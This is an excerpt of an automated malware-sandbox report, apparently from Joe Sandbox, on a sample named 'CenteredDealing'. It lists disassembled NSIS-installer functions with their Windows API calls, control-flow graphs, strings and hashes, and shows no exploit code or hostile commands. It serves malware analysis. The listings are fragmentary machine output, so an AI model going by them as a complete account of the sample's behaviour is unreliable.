                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                                                • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                                                • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                                                • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                                                                                                                                                                                                                Function 0040592C Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 233stringregistrylibraryCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                                                                                                                                                                                                                  • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(9732,?,?,?,9732,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,.exe,9732,?,?,?,9732,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(9732), ref: 00405A4E
                                                                                                                                                                                                                                                                  • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                                                                                                                                                                                                                • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                                                                                                                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                                                                                                                                                                                                                • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                                                                                                                                                                                                                  • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                                                                                                                                                                                                                • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                                                                                                                                                                                                                • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                                                                                                                                                                                                                • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                                                • String ID: .DEFAULT\Control Panel\International$.exe$9732$@rD$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                                                • API String ID: 608394941-1343473643
                                                                                                                                                                                                                                                                • Opcode ID: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b5ab136357e203ee2e090d14ec2b93cf78a9c4147554daf2c52a3a548f14690
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                                                                                                                                                                                                                Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(9732),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                                                                                                                                                                                                  • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00000000,00000000,TemperatureHighHunterTrash,004CB0B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                                                • CompareFileTime.KERNEL32(-00000014,?,TemperatureHighHunterTrash,TemperatureHighHunterTrash,00000000,00000000,TemperatureHighHunterTrash,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                                                  • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                                                • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TemperatureHighHunterTrash
                                                                                                                                                                                                                                                                • API String ID: 4286501637-4146098718
                                                                                                                                                                                                                                                                • Opcode ID: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b155778cc10115f8d02ccc56e208397f172a866a515c636f57ea647fec07d827
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                                                                                                                                                                                                                Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 653 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 656 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 653->656 657 4035d7-4035dc 653->657 665 403615 656->665 666 4036fc-40370a call 4032d2 656->666 658 4037b6-4037ba 657->658 668 40361a-403631 665->668 672 403710-403713 666->672 673 4037c5-4037ca 666->673 670 403633 668->670 671 403635-403637 call 403336 668->671 670->671 677 40363c-40363e 671->677 675 403715-40372d call 403368 call 403336 672->675 676 40373f-403769 GlobalAlloc call 403368 call 40337f 672->676 673->658 675->673 703 403733-403739 675->703 676->673 701 40376b-40377c 676->701 679 403644-40364b 677->679 680 4037bd-4037c4 call 4032d2 677->680 685 4036c7-4036cb 679->685 686 40364d-403661 call 405e0c 679->686 680->673 689 4036d5-4036db 685->689 690 4036cd-4036d4 call 4032d2 685->690 686->689 700 403663-40366a 686->700 697 4036ea-4036f4 689->697 698 4036dd-4036e7 call 407281 689->698 690->689 697->668 702 4036fa 697->702 698->697 700->689 706 40366c-403673 700->706 707 403784-403787 701->707 708 40377e 701->708 702->666 703->673 703->676 706->689 709 403675-40367c 706->709 710 40378a-403792 707->710 708->707 709->689 711 40367e-403685 709->711 710->710 712 403794-4037af SetFilePointer call 405e0c 710->712 711->689 713 403687-4036a7 711->713 716 4037b4 712->716 713->673 715 4036ad-4036b1 713->715 717 4036b3-4036b7 715->717 718 4036b9-4036c1 715->718 716->658 717->702 717->718 718->689 719 4036c3-4036c5 718->719 719->689
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403598
                                                                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                                                                                                                                                                                                                  • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • soft, xrefs: 00403675
                                                                                                                                                                                                                                                                • Inst, xrefs: 0040366C
                                                                                                                                                                                                                                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                                                                                                                                                                                                                • Error launching installer, xrefs: 004035D7
                                                                                                                                                                                                                                                                • Null, xrefs: 0040367E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                                                                • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                                                                • API String ID: 4283519449-527102705
                                                                                                                                                                                                                                                                • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                                                                                                                                                                                                                Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 720 40337f-403396 721 403398 720->721 722 40339f-4033a7 720->722 721->722 723 4033a9 722->723 724 4033ae-4033b3 722->724 723->724 725 4033c3-4033d0 call 403336 724->725 726 4033b5-4033be call 403368 724->726 730 4033d2 725->730 731 4033da-4033e1 725->731 726->725 732 4033d4-4033d5 730->732 733 4033e7-403407 GetTickCount call 4072f2 731->733 734 403518-40351a 731->734 735 403539-40353d 732->735 746 403536 733->746 748 40340d-403415 733->748 736 40351c-40351f 734->736 737 40357f-403583 734->737 739 403521 736->739 740 403524-40352d call 403336 736->740 741 403540-403546 737->741 742 403585 737->742 739->740 740->730 755 403533 740->755 744 403548 741->744 745 40354b-403559 call 403336 741->745 742->746 744->745 745->730 757 40355f-403572 WriteFile 745->757 746->735 751 403417 748->751 752 40341a-403428 call 403336 748->752 751->752 752->730 758 40342a-403433 752->758 755->746 759 403511-403513 757->759 760 403574-403577 757->760 761 403439-403456 call 407312 758->761 759->732 760->759 762 403579-40357c 760->762 765 40350a-40350c 761->765 766 40345c-403473 GetTickCount 761->766 762->737 765->732 767 403475-40347d 766->767 768 4034be-4034c2 766->768 769 403485-4034b6 MulDiv wsprintfW call 404f72 767->769 770 40347f-403483 767->770 771 4034c4-4034c7 768->771 772 4034ff-403502 768->772 778 4034bb 769->778 770->768 770->769 775 4034e7-4034ed 771->775 776 4034c9-4034db WriteFile 771->776 772->748 773 403508 772->773 773->746 777 4034f3-4034f7 775->777 776->759 779 4034dd-4034e0 776->779 777->761 781 4034fd 777->781 778->768 779->759 780 4034e2-4034e5 779->780 780->777 781->746
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004033E7
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00403464
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 00403491
                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 004034A4
                                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(00000000,00000000,?,7FFFFFFF,00000000), ref: 004034D3
                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,0041F150,?,00000000,00000000,0041F150,?,000000FF,00000004,00000000,00000000,00000000), ref: 0040356A
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                                                • String ID: ... %d%%$P1B$X1C$X1C
                                                                                                                                                                                                                                                                • API String ID: 651206458-1535804072
                                                                                                                                                                                                                                                                • Opcode ID: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                • Instruction ID: 0313947f0097750978ec936bbe46de4fad37e772bc1cb17ec77dd8e30cfa9ece
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 44661cc85d05d2ece2df72a1dadfaff530150b4f00ec14a98415859341c8c9fb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 88518D71900219ABDF10DF65AE44AAF7BACAB00316F14417BF900B7290DB78DF40CBA9
                                                                                                                                                                                                                                                                Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 782 404f72-404f85 783 405042-405044 782->783 784 404f8b-404f9e 782->784 785 404fa0-404fa4 call 406805 784->785 786 404fa9-404fb5 lstrlenW 784->786 785->786 788 404fd2-404fd6 786->788 789 404fb7-404fc7 lstrlenW 786->789 792 404fe5-404fe9 788->792 793 404fd8-404fdf SetWindowTextW 788->793 790 405040-405041 789->790 791 404fc9-404fcd lstrcatW 789->791 790->783 791->788 794 404feb-40502d SendMessageW * 3 792->794 795 40502f-405031 792->795 793->792 794->795 795->790 796 405033-405038 795->796 796->790
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                                                                                                                                                                                                  • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1777377487.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777362489.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777393263.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777408702.000000000048F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1777505554.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_CenteredDealing.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                • Opcode ID: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                • Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a81920338a541d7bcc419c3bcbb2810a04374694b2a6e658d803f75c228445d
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98
                                                                                                                                                                                                                                                                Function 00401EB9 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 78COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
